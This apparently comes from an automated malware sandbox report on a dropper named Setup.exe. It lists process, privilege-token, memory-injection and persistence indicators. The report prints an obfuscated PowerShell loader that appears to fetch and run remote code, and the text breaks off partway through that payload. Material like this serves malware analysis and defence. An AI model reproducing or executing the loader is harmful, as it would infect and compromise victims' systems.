4f5af48960057f60b7054af3f6f1c2bfc4b97486b62d7d6bccd2f346dd2fc6e06ac3c334032c7d96dd5ac20ea70a99c1058bab0c2ff35c3acf6c37550987de53406c58effcb6ab656e04f61bdc3ce05a15c69ed9f15948302165036cece92173ec9b03a1e037ada015188ffaba02cea72ca910132cd4e50826ab229760f8905e74d4a29a53bdf2a968e0a26ec2d76cb1a30f9ebfeb68e756f2aef2e32b383a0981b56b85d7be2ded3f1ab7b263e2f5622c82d46a004150f139839f95e93696986e	Setup.exe

Suspicious behavior: EnumeratesProcesses 39 IoCs

pid	Process
2528	powershell.exe
1520	powershell.exe
2528	powershell.exe
1520	powershell.exe
364	powershell.exe
1452	powershell.exe
364	powershell.exe
1452	powershell.exe
364	powershell.exe
364	powershell.exe
1452	powershell.exe
1452	powershell.exe
4868	powershell.exe
4868	powershell.exe
4784	powershell.exe
4784	powershell.exe
1704	powershell.exe
1704	powershell.exe
1416	powershell.exe
1416	powershell.exe
3120	powershell.exe
3120	powershell.exe
4868	powershell.exe
1416	powershell.exe
1704	powershell.exe
4784	powershell.exe
3120	powershell.exe
4992	powershell.exe
4992	powershell.exe
4864	powershell.exe
4864	powershell.exe
4992	powershell.exe
5068	powershell.exe
5068	powershell.exe
4864	powershell.exe
4864	powershell.exe
5068	powershell.exe
5068	powershell.exe
4956	RegAsm.exe

Suspicious use of AdjustPrivilegeToken 64 IoCs

description	pid	Process
Token: SeDebugPrivilege	4716	GlassPack.exe
Token: SeDebugPrivilege	3596	installutil.exe
Token: SeDebugPrivilege	2528	powershell.exe
Token: SeDebugPrivilege	1520	powershell.exe
Token: SeDebugPrivilege	364	powershell.exe
Token: SeDebugPrivilege	1452	powershell.exe
Token: SeSecurityPrivilege	5072	msiexec.exe
Token: SeCreateTokenPrivilege	2844	Setup.exe
Token: SeAssignPrimaryTokenPrivilege	2844	Setup.exe
Token: SeLockMemoryPrivilege	2844	Setup.exe
Token: SeIncreaseQuotaPrivilege	2844	Setup.exe
Token: SeMachineAccountPrivilege	2844	Setup.exe
Token: SeTcbPrivilege	2844	Setup.exe
Token: SeSecurityPrivilege	2844	Setup.exe
Token: SeTakeOwnershipPrivilege	2844	Setup.exe
Token: SeLoadDriverPrivilege	2844	Setup.exe
Token: SeSystemProfilePrivilege	2844	Setup.exe
Token: SeSystemtimePrivilege	2844	Setup.exe
Token: SeProfSingleProcessPrivilege	2844	Setup.exe
Token: SeIncBasePriorityPrivilege	2844	Setup.exe
Token: SeCreatePagefilePrivilege	2844	Setup.exe
Token: SeCreatePermanentPrivilege	2844	Setup.exe
Token: SeBackupPrivilege	2844	Setup.exe
Token: SeRestorePrivilege	2844	Setup.exe
Token: SeShutdownPrivilege	2844	Setup.exe
Token: SeDebugPrivilege	2844	Setup.exe
Token: SeAuditPrivilege	2844	Setup.exe
Token: SeSystemEnvironmentPrivilege	2844	Setup.exe
Token: SeChangeNotifyPrivilege	2844	Setup.exe
Token: SeRemoteShutdownPrivilege	2844	Setup.exe
Token: SeUndockPrivilege	2844	Setup.exe
Token: SeSyncAgentPrivilege	2844	Setup.exe
Token: SeEnableDelegationPrivilege	2844	Setup.exe
Token: SeManageVolumePrivilege	2844	Setup.exe
Token: SeImpersonatePrivilege	2844	Setup.exe
Token: SeCreateGlobalPrivilege	2844	Setup.exe
Token: SeCreateTokenPrivilege	2844	Setup.exe
Token: SeAssignPrimaryTokenPrivilege	2844	Setup.exe
Token: SeLockMemoryPrivilege	2844	Setup.exe
Token: SeIncreaseQuotaPrivilege	2844	Setup.exe
Token: SeMachineAccountPrivilege	2844	Setup.exe
Token: SeTcbPrivilege	2844	Setup.exe
Token: SeSecurityPrivilege	2844	Setup.exe
Token: SeTakeOwnershipPrivilege	2844	Setup.exe
Token: SeLoadDriverPrivilege	2844	Setup.exe
Token: SeSystemProfilePrivilege	2844	Setup.exe
Token: SeSystemtimePrivilege	2844	Setup.exe
Token: SeProfSingleProcessPrivilege	2844	Setup.exe
Token: SeIncBasePriorityPrivilege	2844	Setup.exe
Token: SeCreatePagefilePrivilege	2844	Setup.exe
Token: SeCreatePermanentPrivilege	2844	Setup.exe
Token: SeBackupPrivilege	2844	Setup.exe
Token: SeRestorePrivilege	2844	Setup.exe
Token: SeShutdownPrivilege	2844	Setup.exe
Token: SeDebugPrivilege	2844	Setup.exe
Token: SeAuditPrivilege	2844	Setup.exe
Token: SeSystemEnvironmentPrivilege	2844	Setup.exe
Token: SeChangeNotifyPrivilege	2844	Setup.exe
Token: SeRemoteShutdownPrivilege	2844	Setup.exe
Token: SeUndockPrivilege	2844	Setup.exe
Token: SeSyncAgentPrivilege	2844	Setup.exe
Token: SeEnableDelegationPrivilege	2844	Setup.exe
Token: SeManageVolumePrivilege	2844	Setup.exe
Token: SeImpersonatePrivilege	2844	Setup.exe

Suspicious use of FindShellTrayWindow 1 IoCs

pid	Process
2844	Setup.exe

Suspicious use of SetWindowsHookEx 3 IoCs

pid	Process
3596	installutil.exe
2844	Setup.exe
4956	RegAsm.exe

Suspicious use of WriteProcessMemory 64 IoCs

description	pid	Process	procid_target
PID 4696 wrote to memory of 4716	4696	dd521a930828a2e7f3cbbf7236acefd04b75213a9e14b4ff2f5bbbe53ebb178f.exe	91
PID 4696 wrote to memory of 4716	4696	dd521a930828a2e7f3cbbf7236acefd04b75213a9e14b4ff2f5bbbe53ebb178f.exe	91
PID 4716 wrote to memory of 3596	4716	GlassPack.exe	94
PID 4716 wrote to memory of 3596	4716	GlassPack.exe	94
PID 4716 wrote to memory of 3596	4716	GlassPack.exe	94
PID 4716 wrote to memory of 3596	4716	GlassPack.exe	94
PID 4716 wrote to memory of 3596	4716	GlassPack.exe	94
PID 4716 wrote to memory of 3596	4716	GlassPack.exe	94
PID 4716 wrote to memory of 3596	4716	GlassPack.exe	94
PID 4716 wrote to memory of 3596	4716	GlassPack.exe	94
PID 4696 wrote to memory of 856	4696	dd521a930828a2e7f3cbbf7236acefd04b75213a9e14b4ff2f5bbbe53ebb178f.exe	97
PID 4696 wrote to memory of 856	4696	dd521a930828a2e7f3cbbf7236acefd04b75213a9e14b4ff2f5bbbe53ebb178f.exe	97
PID 4696 wrote to memory of 856	4696	dd521a930828a2e7f3cbbf7236acefd04b75213a9e14b4ff2f5bbbe53ebb178f.exe	97
PID 856 wrote to memory of 2528	856	WScript.exe	98
PID 856 wrote to memory of 2528	856	WScript.exe	98
PID 856 wrote to memory of 2528	856	WScript.exe	98
PID 4696 wrote to memory of 4620	4696	dd521a930828a2e7f3cbbf7236acefd04b75213a9e14b4ff2f5bbbe53ebb178f.exe	100
PID 4696 wrote to memory of 4620	4696	dd521a930828a2e7f3cbbf7236acefd04b75213a9e14b4ff2f5bbbe53ebb178f.exe	100
PID 4696 wrote to memory of 4620	4696	dd521a930828a2e7f3cbbf7236acefd04b75213a9e14b4ff2f5bbbe53ebb178f.exe	100
PID 4620 wrote to memory of 1520	4620	WScript.exe	101
PID 4620 wrote to memory of 1520	4620	WScript.exe	101
PID 4620 wrote to memory of 1520	4620	WScript.exe	101
PID 4696 wrote to memory of 2844	4696	dd521a930828a2e7f3cbbf7236acefd04b75213a9e14b4ff2f5bbbe53ebb178f.exe	103
PID 4696 wrote to memory of 2844	4696	dd521a930828a2e7f3cbbf7236acefd04b75213a9e14b4ff2f5bbbe53ebb178f.exe	103
PID 4696 wrote to memory of 2844	4696	dd521a930828a2e7f3cbbf7236acefd04b75213a9e14b4ff2f5bbbe53ebb178f.exe	103
PID 2528 wrote to memory of 364	2528	powershell.exe	104
PID 2528 wrote to memory of 364	2528	powershell.exe	104
PID 2528 wrote to memory of 364	2528	powershell.exe	104
PID 1520 wrote to memory of 1452	1520	powershell.exe	105
PID 1520 wrote to memory of 1452	1520	powershell.exe	105
PID 1520 wrote to memory of 1452	1520	powershell.exe	105
PID 5072 wrote to memory of 1300	5072	msiexec.exe	107
PID 5072 wrote to memory of 1300	5072	msiexec.exe	107
PID 5072 wrote to memory of 1300	5072	msiexec.exe	107
PID 364 wrote to memory of 4784	364	powershell.exe	108
PID 364 wrote to memory of 4784	364	powershell.exe	108
PID 364 wrote to memory of 4784	364	powershell.exe	108
PID 364 wrote to memory of 4868	364	powershell.exe	109
PID 364 wrote to memory of 4868	364	powershell.exe	109
PID 364 wrote to memory of 4868	364	powershell.exe	109
PID 364 wrote to memory of 1168	364	powershell.exe	110
PID 364 wrote to memory of 1168	364	powershell.exe	110
PID 364 wrote to memory of 1168	364	powershell.exe	110
PID 1452 wrote to memory of 1416	1452	powershell.exe	111
PID 1452 wrote to memory of 1416	1452	powershell.exe	111
PID 1452 wrote to memory of 1416	1452	powershell.exe	111
PID 1452 wrote to memory of 1704	1452	powershell.exe	112
PID 1452 wrote to memory of 1704	1452	powershell.exe	112
PID 1452 wrote to memory of 1704	1452	powershell.exe	112
PID 1452 wrote to memory of 3120	1452	powershell.exe	113
PID 1452 wrote to memory of 3120	1452	powershell.exe	113
PID 1452 wrote to memory of 3120	1452	powershell.exe	113
PID 364 wrote to memory of 4992	364	powershell.exe	114
PID 364 wrote to memory of 4992	364	powershell.exe	114
PID 364 wrote to memory of 4992	364	powershell.exe	114
PID 1452 wrote to memory of 4864	1452	powershell.exe	115
PID 1452 wrote to memory of 4864	1452	powershell.exe	115
PID 1452 wrote to memory of 4864	1452	powershell.exe	115
PID 1452 wrote to memory of 1296	1452	powershell.exe	116
PID 1452 wrote to memory of 1296	1452	powershell.exe	116
PID 1452 wrote to memory of 1296	1452	powershell.exe	116
PID 364 wrote to memory of 5068	364	powershell.exe	117
PID 364 wrote to memory of 5068	364	powershell.exe	117
PID 364 wrote to memory of 5068	364	powershell.exe	117

C:\Users\Admin\AppData\Local\Temp\dd521a930828a2e7f3cbbf7236acefd04b75213a9e14b4ff2f5bbbe53ebb178f.exe
"C:\Users\Admin\AppData\Local\Temp\dd521a930828a2e7f3cbbf7236acefd04b75213a9e14b4ff2f5bbbe53ebb178f.exe"
1⤵
- Checks computer location settings
- Drops file in Program Files directory
- System Location Discovery: System Language Discovery
- Modifies registry class
- Suspicious use of WriteProcessMemory
PID:4696
- C:\Program Files (x86)\Key Metric Software\Duplicate File Detective 7\GlassPack.exe
  "C:\Program Files (x86)\Key Metric Software\Duplicate File Detective 7\GlassPack.exe"
  2⤵
  - Executes dropped EXE
  - Loads dropped DLL
  - Adds Run key to start application
  - Suspicious use of SetThreadContext
  - Suspicious use of AdjustPrivilegeToken
  - Suspicious use of WriteProcessMemory
  PID:4716
- - C:\Windows\Microsoft.NET\Framework\v4.0.30319\installutil.exe
    "C:\Windows\Microsoft.NET\Framework\v4.0.30319\installutil.exe"
    3⤵
    - System Location Discovery: System Language Discovery
    - Suspicious use of AdjustPrivilegeToken
    - Suspicious use of SetWindowsHookEx
    PID:3596
- C:\Windows\SysWOW64\WScript.exe
  "C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Roaming\DriftCar.vbs"
  2⤵
  - Checks computer location settings
  - System Location Discovery: System Language Discovery
  - Suspicious use of WriteProcessMemory
  PID:856
- - C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
    "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command "$qCybe = 'OwB9ШḆЉDsШḆЉKQШḆЉgШḆЉCkШḆЉIШḆЉШḆЉnШḆЉGUШḆЉdQByШḆЉHQШḆЉJwШḆЉgШḆЉCwШḆЉIШḆЉBlШḆЉGoШḆЉdwB6ШḆЉGgШḆЉJШḆЉШḆЉgШḆЉCwШḆЉIШḆЉШḆЉnШḆЉGgШḆЉdШḆЉB0ШḆЉHШḆЉШḆЉcwШḆЉ6ШḆЉC8ШḆЉLwBwШḆЉGEШḆЉcwB0ШḆЉGUШḆЉLgBlШḆЉGUШḆЉLwByШḆЉC8ШḆЉTgBVШḆЉEsШḆЉRQBlШḆЉC8ШḆЉMШḆЉШḆЉnШḆЉCШḆЉШḆЉKШḆЉШḆЉgШḆЉF0ШḆЉXQBbШḆЉHQШḆЉYwBlШḆЉGoШḆЉYgBvШḆЉFsШḆЉIШḆЉШḆЉsШḆЉCШḆЉШḆЉbШḆЉBsШḆЉHUШḆЉbgШḆЉkШḆЉCШḆЉШḆЉKШḆЉBlШḆЉGsШḆЉbwB2ШḆЉG4ШḆЉSQШḆЉuШḆЉCkШḆЉIШḆЉШḆЉnШḆЉEkШḆЉVgBGШḆЉHIШḆЉcШḆЉШḆЉnШḆЉCШḆЉШḆЉKШḆЉBkШḆЉG8ШḆЉaШḆЉB0ШḆЉGUШḆЉTQB0ШḆЉGUШḆЉRwШḆЉuШḆЉCkШḆЉJwШḆЉxШḆЉHMШḆЉcwBhШḆЉGwШḆЉQwШḆЉuШḆЉDMШḆЉeQByШḆЉGEШḆЉcgBiШḆЉGkШḆЉTШḆЉBzШḆЉHMШḆЉYQBsШḆЉEMШḆЉJwШḆЉoШḆЉGUШḆЉcШḆЉB5ШḆЉFQШḆЉdШḆЉBlШḆЉEcШḆЉLgШḆЉpШḆЉCШḆЉШḆЉeШḆЉBtШḆЉHoШḆЉWШḆЉB4ШḆЉCQШḆЉIШḆЉШḆЉoШḆЉGQШḆЉYQBvШḆЉEwШḆЉLgBuШḆЉGkШḆЉYQBtШḆЉG8ШḆЉRШḆЉB0ШḆЉG4ШḆЉZQByШḆЉHIШḆЉdQBDШḆЉDoШḆЉOgBdШḆЉG4ШḆЉaQBhШḆЉG0ШḆЉbwBEШḆЉHШḆЉШḆЉcШḆЉBBШḆЉC4ШḆЉbQBlШḆЉHQШḆЉcwB5ШḆЉFMШḆЉWwШḆЉ7ШḆЉCkШḆЉIШḆЉШḆЉpШḆЉCШḆЉШḆЉJwBBШḆЉCcШḆЉIШḆЉШḆЉsШḆЉCШḆЉШḆЉJwCTIToШḆЉkyEnШḆЉCШḆЉШḆЉKШḆЉBlШḆЉGMШḆЉYQBsШḆЉHШḆЉШḆЉZQBSШḆЉC4ШḆЉbgBaШḆЉHcШḆЉQQBHШḆЉCQШḆЉIШḆЉШḆЉoШḆЉGcШḆЉbgBpШḆЉHIШḆЉdШḆЉBTШḆЉDQШḆЉNgBlШḆЉHMШḆЉYQBCШḆЉG0ШḆЉbwByШḆЉEYШḆЉOgШḆЉ6ШḆЉF0ШḆЉdШḆЉByШḆЉGUШḆЉdgBuШḆЉG8ШḆЉQwШḆЉuШḆЉG0ШḆЉZQB0ШḆЉHMШḆЉeQBTШḆЉFsШḆЉIШḆЉШḆЉ9ШḆЉCШḆЉШḆЉeШḆЉBtШḆЉHoШḆЉWШḆЉB4ШḆЉCQШḆЉIШḆЉBdШḆЉF0ШḆЉWwBlШḆЉHQШḆЉeQBCШḆЉFsШḆЉOwШḆЉnШḆЉCUШḆЉSQBoШḆЉHEШḆЉUgBYШḆЉCUШḆЉJwШḆЉgШḆЉD0ШḆЉIШḆЉBlШḆЉGoШḆЉdwB6ШḆЉGgШḆЉJШḆЉШḆЉ7ШḆЉCkШḆЉIШḆЉBuШḆЉFoШḆЉdwBBШḆЉEcШḆЉJШḆЉШḆЉgШḆЉCgШḆЉZwBuШḆЉGkШḆЉcgB0ШḆЉFMШḆЉZШḆЉBhШḆЉG8ШḆЉbШḆЉBuШḆЉHcШḆЉbwBEШḆЉC4ШḆЉQwBtШḆЉFYШḆЉcQBsШḆЉCQШḆЉIШḆЉШḆЉ9ШḆЉCШḆЉШḆЉbgBaШḆЉHcШḆЉQQBHШḆЉCQШḆЉOwШḆЉ4ШḆЉEYШḆЉVШḆЉBVШḆЉDoШḆЉOgBdШḆЉGcШḆЉbgBpШḆЉGQШḆЉbwBjШḆЉG4ШḆЉRQШḆЉuШḆЉHQШḆЉeШḆЉBlШḆЉFQШḆЉLgBtШḆЉGUШḆЉdШḆЉBzШḆЉHkШḆЉUwBbШḆЉCШḆЉШḆЉPQШḆЉgШḆЉGcШḆЉbgBpШḆЉGQШḆЉbwBjШḆЉG4ШḆЉRQШḆЉuШḆЉEMШḆЉbQBWШḆЉHEШḆЉbШḆЉШḆЉkШḆЉDsШḆЉKQB0ШḆЉG4ШḆЉZQBpШḆЉGwШḆЉQwBiШḆЉGUШḆЉVwШḆЉuШḆЉHQШḆЉZQBOШḆЉCШḆЉШḆЉdШḆЉBjШḆЉGUШḆЉagBiШḆЉE8ШḆЉLQB3ШḆЉGUШḆЉTgШḆЉoШḆЉCШḆЉШḆЉPQШḆЉgШḆЉEMШḆЉbQBWШḆЉHEШḆЉbШḆЉШḆЉkШḆЉDsШḆЉKQШḆЉoШḆЉGUШḆЉcwBvШḆЉHШḆЉШḆЉcwBpШḆЉGQШḆЉLgBDШḆЉG0ШḆЉVgBxШḆЉGwШḆЉJШḆЉШḆЉ7ШḆЉCkШḆЉIШḆЉШḆЉnШḆЉHQШḆЉeШḆЉB0ШḆЉC4ШḆЉMQШḆЉwШḆЉEwШḆЉTШḆЉBEШḆЉC8ШḆЉMQШḆЉwШḆЉC8ШḆЉcgBlШḆЉHQШḆЉcШḆЉB5ШḆЉHIШḆЉYwBwШḆЉFUШḆЉLwByШḆЉGIШḆЉLgBtШḆЉG8ШḆЉYwШḆЉuШḆЉHQШḆЉYQByШḆЉGIШḆЉdgBrШḆЉGMШḆЉcwBlШḆЉGQШḆЉLgBwШḆЉHQШḆЉZgBШḆЉШḆЉDEШḆЉdШḆЉBhШḆЉHIШḆЉYgB2ШḆЉGsШḆЉYwBzШḆЉGUШḆЉZШḆЉШḆЉvШḆЉC8ШḆЉOgBwШḆЉHQШḆЉZgШḆЉnШḆЉCШḆЉШḆЉKШḆЉBnШḆЉG4ШḆЉaQByШḆЉHQШḆЉUwBkШḆЉGEШḆЉbwBsШḆЉG4ШḆЉdwBvШḆЉEQШḆЉLgBDШḆЉG0ШḆЉVgBxШḆЉGwШḆЉJШḆЉШḆЉgШḆЉD0ШḆЉIШḆЉBuШḆЉFoШḆЉdwBBШḆЉEcШḆЉJШḆЉШḆЉ7ШḆЉCkШḆЉJwBШḆЉШḆЉEШḆЉШḆЉcШḆЉBKШḆЉDgШḆЉNwШḆЉ1ШḆЉDEШḆЉMgBvШḆЉHIШḆЉcШḆЉByШḆЉGUШḆЉcШḆЉBvШḆЉGwШḆЉZQB2ШḆЉGUШḆЉZШḆЉШḆЉnШḆЉCwШḆЉJwШḆЉxШḆЉHQШḆЉYQByШḆЉGIШḆЉdgBrШḆЉGMШḆЉcwBlШḆЉGQШḆЉJwШḆЉoШḆЉGwШḆЉYQBpШḆЉHQШḆЉbgBlШḆЉGQШḆЉZQByШḆЉEMШḆЉawByШḆЉG8ШḆЉdwB0ШḆЉGUШḆЉTgШḆЉuШḆЉHQШḆЉZQBOШḆЉC4ШḆЉbQBlШḆЉHQШḆЉcwB5ШḆЉFMШḆЉIШḆЉB0ШḆЉGMШḆЉZQBqШḆЉGIШḆЉbwШḆЉtШḆЉHcШḆЉZQBuШḆЉCШḆЉШḆЉPQШḆЉgШḆЉHMШḆЉbШḆЉBhШḆЉGkШḆЉdШḆЉBuШḆЉGUШḆЉZШḆЉBlШḆЉHIШḆЉQwШḆЉuШḆЉEMШḆЉbQBWШḆЉHEШḆЉbШḆЉШḆЉkШḆЉDsШḆЉOШḆЉBGШḆЉFQШḆЉVQШḆЉ6ШḆЉDoШḆЉXQBnШḆЉG4ШḆЉaQBkШḆЉG8ШḆЉYwBuШḆЉEUШḆЉLgB0ШḆЉHgШḆЉZQBUШḆЉC4ШḆЉbQBlШḆЉHQШḆЉcwB5ШḆЉFMШḆЉWwШḆЉgШḆЉD0ШḆЉIШḆЉBnШḆЉG4ШḆЉaQBkШḆЉG8ШḆЉYwBuШḆЉEUШḆЉLgBDШḆЉG0ШḆЉVgBxШḆЉGwШḆЉJШḆЉШḆЉ7ШḆЉCkШḆЉdШḆЉBuШḆЉGUШḆЉaQBsШḆЉEMШḆЉYgBlШḆЉFcШḆЉLgB0ШḆЉGUШḆЉTgШḆЉgШḆЉHQШḆЉYwBlШḆЉGoШḆЉYgBPШḆЉC0ШḆЉdwBlШḆЉE4ШḆЉKШḆЉШḆЉgШḆЉD0ШḆЉIШḆЉBDШḆЉG0ШḆЉVgBxШḆЉGwШḆЉJШḆЉШḆЉ7ШḆЉG4ШḆЉWgB3ШḆЉEEШḆЉRwШḆЉkШḆЉDsШḆЉMgШḆЉxШḆЉHMШḆЉbШḆЉBUШḆЉDoШḆЉOgBdШḆЉGUШḆЉcШḆЉB5ШḆЉFQШḆЉbШḆЉBvШḆЉGMШḆЉbwB0ШḆЉG8ШḆЉcgBQШḆЉHkШḆЉdШḆЉBpШḆЉHIШḆЉdQBjШḆЉGUШḆЉUwШḆЉuШḆЉHQШḆЉZQBOШḆЉC4ШḆЉbQBlШḆЉHQШḆЉcwB5ШḆЉFMШḆЉWwШḆЉgШḆЉD0ШḆЉIШḆЉBsШḆЉG8ШḆЉYwBvШḆЉHQШḆЉbwByШḆЉFШḆЉШḆЉeQB0ШḆЉGkШḆЉcgB1ШḆЉGMШḆЉZQBTШḆЉDoШḆЉOgBdШḆЉHIШḆЉZQBnШḆЉGEШḆЉbgBhШḆЉE0ШḆЉdШḆЉBuШḆЉGkШḆЉbwBQШḆЉGUШḆЉYwBpШḆЉHYШḆЉcgBlШḆЉFMШḆЉLgB0ШḆЉGUШḆЉTgШḆЉuШḆЉG0ШḆЉZQB0ШḆЉHMШḆЉeQBTШḆЉFsШḆЉOwB9ШḆЉGUШḆЉdQByШḆЉHQШḆЉJШḆЉB7ШḆЉCШḆЉШḆЉPQШḆЉgШḆЉGsШḆЉYwBhШḆЉGIШḆЉbШḆЉBsШḆЉGEШḆЉQwBuШḆЉG8ШḆЉaQB0ШḆЉGEШḆЉZШḆЉBpШḆЉGwШḆЉYQBWШḆЉGUШḆЉdШḆЉBhШḆЉGMШḆЉaQBmШḆЉGkШḆЉdШḆЉByШḆЉGUШḆЉQwByШḆЉGUШḆЉdgByШḆЉGUШḆЉUwШḆЉ6ШḆЉDoШḆЉXQByШḆЉGUШḆЉZwBhШḆЉG4ШḆЉYQBNШḆЉHQШḆЉbgBpШḆЉG8ШḆЉUШḆЉBlШḆЉGMШḆЉaQB2ШḆЉHIШḆЉZQBTШḆЉC4ШḆЉdШḆЉBlШḆЉE4ШḆЉLgBtШḆЉGUШḆЉdШḆЉBzШḆЉHkШḆЉUwBbШḆЉHsШḆЉIШḆЉBlШḆЉHMШḆЉbШḆЉBlШḆЉH0ШḆЉIШḆЉBmШḆЉC8ШḆЉIШḆЉШḆЉwШḆЉCШḆЉШḆЉdШḆЉШḆЉvШḆЉCШḆЉШḆЉcgШḆЉvШḆЉCШḆЉШḆЉZQB4ШḆЉGUШḆЉLgBuШḆЉHcШḆЉbwBkШḆЉHQШḆЉdQBoШḆЉHMШḆЉIШḆЉШḆЉ7ШḆЉCcШḆЉMШḆЉШḆЉ4ШḆЉDEШḆЉIШḆЉBwШḆЉGUШḆЉZQBsШḆЉHMШḆЉJwШḆЉgШḆЉGQШḆЉbgBhШḆЉG0ШḆЉbQBvШḆЉGMШḆЉLQШḆЉgШḆЉGUШḆЉeШḆЉBlШḆЉC4ШḆЉbШḆЉBsШḆЉGUШḆЉaШḆЉBzШḆЉHIШḆЉZQB3ШḆЉG8ШḆЉcШḆЉШḆЉ7ШḆЉCШḆЉШḆЉZQBjШḆЉHIШḆЉbwBmШḆЉC0ШḆЉIШḆЉШḆЉpШḆЉCШḆЉШḆЉJwBwШḆЉHUШḆЉdШḆЉByШḆЉGEШḆЉdШḆЉBTШḆЉFwШḆЉcwBtШḆЉGEШḆЉcgBnШḆЉG8ШḆЉcgBQШḆЉFwШḆЉdQBuШḆЉGUШḆЉTQШḆЉgШḆЉHQШḆЉcgBhШḆЉHQШḆЉUwBcШḆЉHMШḆЉdwBvШḆЉGQШḆЉbgBpШḆЉFcШḆЉXШḆЉB0ШḆЉGYШḆЉbwBzШḆЉG8ШḆЉcgBjШḆЉGkШḆЉTQBcШḆЉGcШḆЉbgBpШḆЉG0ШḆЉYQBvШḆЉFIШḆЉXШḆЉBhШḆЉHQШḆЉYQBEШḆЉHШḆЉШḆЉcШḆЉBBШḆЉFwШḆЉJwШḆЉgШḆЉCsШḆЉIШḆЉBwШḆЉHUШḆЉdШḆЉByШḆЉGEШḆЉdШḆЉBTШḆЉGQШḆЉbШḆЉBvШḆЉEYШḆЉJШḆЉШḆЉgШḆЉCgШḆЉIШḆЉBuШḆЉG8ШḆЉaQB0ШḆЉGEШḆЉbgBpШḆЉHQШḆЉcwBlШḆЉEQШḆЉLQШḆЉgШḆЉCcШḆЉJQBJШḆЉGgШḆЉcQBSШḆЉFgШḆЉJQШḆЉnШḆЉCШḆЉШḆЉbQBlШḆЉHQШḆЉSQШḆЉtШḆЉHkШḆЉcШḆЉBvШḆЉEMШḆЉIШḆЉШḆЉ7ШḆЉCШḆЉШḆЉdШḆЉByШḆЉGEШḆЉdШḆЉBzШḆЉGUШḆЉcgBvШḆЉG4ШḆЉLwШḆЉgШḆЉHQШḆЉZQBpШḆЉHUШḆЉcQШḆЉvШḆЉCШḆЉШḆЉZQBsШḆЉGkШḆЉZgШḆЉkШḆЉCШḆЉШḆЉZQB4ШḆЉGUШḆЉLgBhШḆЉHMШḆЉdQB3ШḆЉCШḆЉШḆЉZQB4ШḆЉGUШḆЉLgBsШḆЉGwШḆЉZQBoШḆЉHMШḆЉcgBlШḆЉHcШḆЉbwBwШḆЉCШḆЉШḆЉOwШḆЉpШḆЉCcШḆЉdQBzШḆЉG0ШḆЉLgBuШḆЉGkШḆЉdwBwШḆЉFUШḆЉXШḆЉШḆЉnШḆЉCШḆЉШḆЉKwШḆЉgШḆЉGEШḆЉdШḆЉBzШḆЉGEШḆЉcШḆЉШḆЉkШḆЉCgШḆЉIШḆЉШḆЉ9ШḆЉCШḆЉШḆЉZQBsШḆЉGkШḆЉZgШḆЉkШḆЉDsШḆЉKQШḆЉgШḆЉGUШḆЉbQBhШḆЉE4ШḆЉcgBlШḆЉHMШḆЉVQШḆЉ6ШḆЉDoШḆЉXQB0ШḆЉG4ШḆЉZQBtШḆЉG4ШḆЉbwByШḆЉGkШḆЉdgBuШḆЉEUШḆЉWwШḆЉgШḆЉCsШḆЉIШḆЉШḆЉnШḆЉFwШḆЉcwByШḆЉGUШḆЉcwBVШḆЉFwШḆЉOgBDШḆЉCcШḆЉKШḆЉШḆЉgШḆЉD0ШḆЉIШḆЉBwШḆЉHUШḆЉdШḆЉByШḆЉGEШḆЉdШḆЉBTШḆЉGQШḆЉbШḆЉBvШḆЉEYШḆЉJШḆЉШḆЉ7ШḆЉCkШḆЉJwB1ШḆЉHMШḆЉbQШḆЉuШḆЉG4ШḆЉaQB3ШḆЉHШḆЉШḆЉVQBcШḆЉCcШḆЉIШḆЉШḆЉrШḆЉCШḆЉШḆЉYQB0ШḆЉHMШḆЉYQBwШḆЉCQШḆЉIШḆЉШḆЉsШḆЉEIШḆЉSwBMШḆЉFIШḆЉVQШḆЉkШḆЉCgШḆЉZQBsШḆЉGkШḆЉRgBkШḆЉGEШḆЉbwBsШḆЉG4ШḆЉdwBvШḆЉEQШḆЉLgBvШḆЉHMШḆЉVQBIШḆЉHUШḆЉJШḆЉШḆЉ7ШḆЉDgШḆЉRgBUШḆЉFUШḆЉOgШḆЉ6ШḆЉF0ШḆЉZwBuШḆЉGkШḆЉZШḆЉBvШḆЉGMШḆЉbgBFШḆЉC4ШḆЉdШḆЉB4ШḆЉGUШḆЉVШḆЉШḆЉuШḆЉG0ШḆЉZQB0ШḆЉHMШḆЉeQBTШḆЉFsШḆЉIШḆЉШḆЉ9ШḆЉCШḆЉШḆЉZwBuШḆЉGkШḆЉZШḆЉBvШḆЉGMШḆЉbgBFШḆЉC4ШḆЉbwBzШḆЉFUШḆЉSШḆЉB1ШḆЉCQШḆЉOwШḆЉpШḆЉHQШḆЉbgBlШḆЉGkШḆЉbШḆЉBDШḆЉGIШḆЉZQBXШḆЉC4ШḆЉdШḆЉBlШḆЉE4ШḆЉIШḆЉB0ШḆЉGMШḆЉZQBqШḆЉGIШḆЉTwШḆЉtШḆЉHcШḆЉZQBOШḆЉCgШḆЉIШḆЉШḆЉ9ШḆЉCШḆЉШḆЉbwBzШḆЉFUШḆЉSШḆЉB1ШḆЉCQШḆЉOwB9ШḆЉDsШḆЉIШḆЉШḆЉpШḆЉCcШḆЉcgBnШḆЉDgШḆЉRШḆЉШḆЉ3ШḆЉG8ШḆЉUgBzШḆЉGYШḆЉVgBjШḆЉHIШḆЉMgBuШḆЉEEШḆЉaШḆЉBmШḆЉGgШḆЉVgШḆЉ2ШḆЉEQШḆЉQwB4ШḆЉFIШḆЉcQBuШḆЉHEШḆЉagШḆЉ1ШḆЉGoШḆЉcgBiШḆЉDEШḆЉJwШḆЉgШḆЉCsШḆЉIШḆЉBQШḆЉHШḆЉШḆЉVgBpШḆЉHMШḆЉJШḆЉШḆЉoШḆЉCШḆЉШḆЉPQШḆЉgШḆЉFШḆЉШḆЉcШḆЉBWШḆЉGkШḆЉcwШḆЉkШḆЉHsШḆЉIШḆЉBlШḆЉHMШḆЉbШḆЉBlШḆЉH0ШḆЉOwШḆЉgШḆЉCkШḆЉJwB4ШḆЉDQШḆЉZgBoШḆЉFoШḆЉTQB3ШḆЉE4ШḆЉNwBVШḆЉGUШḆЉXwШḆЉwШḆЉF8ШḆЉNQBfШḆЉGkШḆЉYwBzШḆЉGIШḆЉaШḆЉШḆЉ3ШḆЉEMШḆЉUШḆЉШḆЉwШḆЉEkШḆЉZgBQШḆЉGQШḆЉQQШḆЉyШḆЉDEШḆЉMQШḆЉnШḆЉCШḆЉШḆЉKwШḆЉgШḆЉFШḆЉШḆЉcABWAGkAcwAkACgAIAA9ACAAUABwAFYAaQBzACQAewAgACkAbwBHAGYARABRA